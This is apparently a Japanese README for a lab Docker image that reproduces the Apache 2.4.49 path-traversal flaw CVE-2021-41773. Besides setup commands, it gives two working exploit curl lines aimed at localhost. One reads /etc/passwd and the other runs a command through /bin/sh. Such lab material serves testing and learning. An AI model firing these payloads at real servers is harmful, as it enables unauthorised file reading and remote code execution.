
CVE-2021-41773用の脆弱なDockerイメージ
この脆弱性は、特定の非デフォルト設定を持つバージョン2.4.49 のみに適用されます。状況によっては、ファイル読み取りまたはコード実行につながる可能性があります。
https://twitter.com/ptswarm/status/1445376079548624899
コンテナはDocker Hubから直接プルできます。
docker pull blueteamsteve/cve-2021-41773:no-cgid
以下のコマンドで実行します。
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Apacheのログは以下で確認できます。または上記の実行コマンドから "-dit" を除外して stdio をストリームすることもできます。
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
コンテナはDocker Hubから直接プルできます。
docker pull blueteamsteve/cve-2021-41773:with-cgid
以下のコマンドで実行します。
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Apacheのログは以下で確認できます。または上記の実行コマンドから "-dit" を除外して stdio をストリームすることもできます。
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
サブディレクトリ内のdockerfileとテンプレートhttpd.confファイルを使用して、独自のバージョンを変更・ビルドしてください。